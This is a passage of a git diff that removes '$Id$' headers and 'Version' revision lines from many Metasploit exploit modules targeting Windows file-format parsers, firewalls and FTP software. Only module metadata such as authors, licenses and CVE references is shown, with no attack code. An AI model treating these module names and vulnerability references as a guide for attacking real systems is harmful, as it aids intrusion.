'Brandon Murphy', #Initial discovery, poc diff --git a/modules/exploits/windows/fileformat/tugzip.rb b/modules/exploits/windows/fileformat/tugzip.rb index 2030362240..7e69975853 100644 --- a/modules/exploits/windows/fileformat/tugzip.rb +++ b/modules/exploits/windows/fileformat/tugzip.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # Metasploit module 'mr_me ', # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '49371' ], diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb index 255e819b9f..f5f9ab29da 100644 --- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb +++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1260' ], diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb index ffc550068f..04c431c2cf 100644 --- a/modules/exploits/windows/fileformat/ultraiso_cue.rb +++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'n00b', # original discovery 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2888' ], diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index b4b647ca86..49e415f40a 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0308' ], diff --git a/modules/exploits/windows/fileformat/varicad_dwb.rb b/modules/exploits/windows/fileformat/varicad_dwb.rb index 218962a4a8..c4634e6767 100644 --- a/modules/exploits/windows/fileformat/varicad_dwb.rb +++ b/modules/exploits/windows/fileformat/varicad_dwb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'MC', # cleanup pass 1 & second offset 'jduck' # cleanup pass 2 & combined offsets ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '63067' ], diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb index abceeeea88..6bff61b596 100644 --- a/modules/exploits/windows/fileformat/videolan_tivo.rb +++ b/modules/exploits/windows/fileformat/videolan_tivo.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4654' ], diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb index 61adc270ab..ff056c214c 100644 --- a/modules/exploits/windows/fileformat/videospirit_visprj.rb +++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Acidgen', #found the vulnerability 'corelanc0d3r ', #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0499'], diff --git a/modules/exploits/windows/fileformat/visio_dxf_bof.rb b/modules/exploits/windows/fileformat/visio_dxf_bof.rb index 02148ea7be..d2b15fc149 100644 --- a/modules/exploits/windows/fileformat/visio_dxf_bof.rb +++ b/modules/exploits/windows/fileformat/visio_dxf_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Shahin Ramezany ', # MOAUB #8 exploit and binary analysis 'juan vazquez', # metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE','2010-1681' ], diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index 634076ccfd..26c30ebf60 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # original discovery & msf exploit 'TecR0c ' # msf exploit ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2386' ], diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb index 2869e3eb69..fbd1812f92 100644 --- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb +++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1574' ], diff --git a/modules/exploits/windows/fileformat/vlc_realtext.rb b/modules/exploits/windows/fileformat/vlc_realtext.rb index 7cec8a7364..29c34b6aac 100644 --- a/modules/exploits/windows/fileformat/vlc_realtext.rb +++ b/modules/exploits/windows/fileformat/vlc_realtext.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'SkD', # Exploit 'juan vazquez' # Metasploit Module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '49809' ], diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index 33a362064e..5afb287f1f 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '35500' ], diff --git a/modules/exploits/windows/fileformat/vlc_webm.rb b/modules/exploits/windows/fileformat/vlc_webm.rb index a93fddc94f..975c42c582 100644 --- a/modules/exploits/windows/fileformat/vlc_webm.rb +++ b/modules/exploits/windows/fileformat/vlc_webm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Dan Rosenberg' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '70698' ], diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index cc23731ecd..dd1281cb9a 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64581'], diff --git a/modules/exploits/windows/fileformat/vuplayer_m3u.rb b/modules/exploits/windows/fileformat/vuplayer_m3u.rb index cab80ab4d3..9288e1253f 100644 --- a/modules/exploits/windows/fileformat/vuplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/vuplayer_m3u.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6251' ], diff --git a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb index 883bdff2b2..e640d3444a 100644 --- a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb +++ b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'sickness', #proof of concept 'corelanc0d3r ', #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1591'], diff --git a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb index 8d712ebc34..47e2aab926 100644 --- a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb +++ b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'fdisk', # Original Exploit 'dookie' # MSF Module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66911'], diff --git a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb index 18a4249c88..d73dd2c758 100644 --- a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb +++ b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'loneferret', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '57162' ], diff --git a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb index ca3cf7d831..1b96e69912 100644 --- a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb +++ b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote structured exception handler record. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'hadji samir ', # Discovered the bug diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index fdec319167..a5dfaef02e 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ', 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0964' ], diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index e007585a24..8d387fc183 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'spoonm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2004-0362'], diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index e9b95ffcad..32478da6bf 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0220'], diff --git a/modules/exploits/windows/ftp/32bitftp_list_reply.rb b/modules/exploits/windows/ftp/32bitftp_list_reply.rb index 0d46b3d905..99217202b7 100644 --- a/modules/exploits/windows/ftp/32bitftp_list_reply.rb +++ b/modules/exploits/windows/ftp/32bitftp_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ' # helped writing this module ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index c87a502a8f..bcc6c0e02c 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'otr' # Windows XP SP3 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0277'], diff --git a/modules/exploits/windows/ftp/aasync_list_reply.rb b/modules/exploits/windows/ftp/aasync_list_reply.rb index b9f84f8f57..5a98653706 100644 --- a/modules/exploits/windows/ftp/aasync_list_reply.rb +++ b/modules/exploits/windows/ftp/aasync_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ', #found bug and wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index 4243d921ef..01808aba44 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2961'], diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index 8dbdaaf78f..ab84ee523e 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # When a DoS is NOT a DoS diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index 867eac60b7..cd636cae98 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2074'], diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index ae1bed34b1..7a57f1b24f 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3952' ], diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index c84f953d62..125e27e1bb 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # various fixes, remove most hardcoded addresses ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '62134' ], diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 6202127081..0f96e523ef 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # modified to use fix-up stub (works with bigger payloads) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '62134' ], diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index cb7441cedf..3dfa8447eb 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # port to metasploit / modified to use fix-up stub (works with bigger payloads) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '62134' ], diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index b35c7bc453..c5cb6daa18 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Jacopo Cervini' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3726' ], diff --git a/modules/exploits/windows/ftp/filewrangler_list_reply.rb b/modules/exploits/windows/ftp/filewrangler_list_reply.rb index bc7f6e6148..332928ee57 100644 --- a/modules/exploits/windows/ftp/filewrangler_list_reply.rb +++ b/modules/exploits/windows/ftp/filewrangler_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ' # wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index 4a4e1f7dcb..1e4513fbaa 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-3683'], diff --git a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb index f950851a41..39a72696ab 100644 --- a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ', # wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'OSVDB', '68638'], diff --git a/modules/exploits/windows/ftp/ftppad_list_reply.rb b/modules/exploits/windows/ftp/ftppad_list_reply.rb index 2bba36acb4..3f7c3ba179 100644 --- a/modules/exploits/windows/ftp/ftppad_list_reply.rb +++ b/modules/exploits/windows/ftp/ftppad_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r' ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 5c862c5758..a8f5092563 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ' #found bug, wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'OSVDB', '68639'], diff --git a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb index 442edbcdf4..14c83a9acb 100644 --- a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb +++ b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ' #wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb index de1838ee32..51e50ec426 100644 --- a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb +++ b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ', # wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'OSVDB', '68641'], diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 6820d2e245..473e949ac2 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Fairuzan Roslan ', 'Mati Aharoni ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1415'], diff --git a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb index afce00c2dd..0f049517ff 100644 --- a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb +++ b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb @@ -1,7 +1,3 @@ -# -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Joff Thyer ', #Improved msf version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6576'], diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index b35f63f48f..16907d90f9 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # original discovery and metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4769' ], diff --git a/modules/exploits/windows/ftp/leapftp_list_reply.rb b/modules/exploits/windows/ftp/leapftp_list_reply.rb index 5a40cb2d77..d760df57c7 100644 --- a/modules/exploits/windows/ftp/leapftp_list_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote 'nullthreat' # Ported PoC to MSF ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'OSVDB', '68640'], diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index 40e6594c2f..0b350bde84 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0558' ], diff --git a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb index 5677cdd2ab..b26e572e18 100644 --- a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb +++ 